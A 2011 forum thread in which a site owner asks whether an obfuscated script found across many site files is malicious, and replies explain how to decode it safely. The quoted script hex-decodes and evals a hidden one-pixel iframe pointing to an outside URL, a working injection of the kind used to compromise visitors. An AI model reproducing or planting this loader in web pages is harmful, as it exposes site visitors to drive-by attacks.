Is this code malicious?

nofel · October 24, 2011, 8:12pm

hi all,
i am going through a website file on my pc and i saw many files. filled up with

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f73617676692d696e766573746d656e74732e636f6d2f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>

can it be a code, i highly doubt it or analytics?

ParkinT · October 24, 2011, 8:32pm

It is obfuscated Javascript. Each pair of digits represents a Hex value. This (one line) script unwraps that long string, assembling the hex values into a single string and then executes the command that string represents.

The best (safest) way to determine if it is benign is to replace that last “eval(t);” with “document.write(t);”

The output will show you what is intended to be ‘executed’

dresden_phoenix · October 25, 2011, 1:47am

Better yet, use alert(t);

(This code appears to document.write an iframe and URL…)btw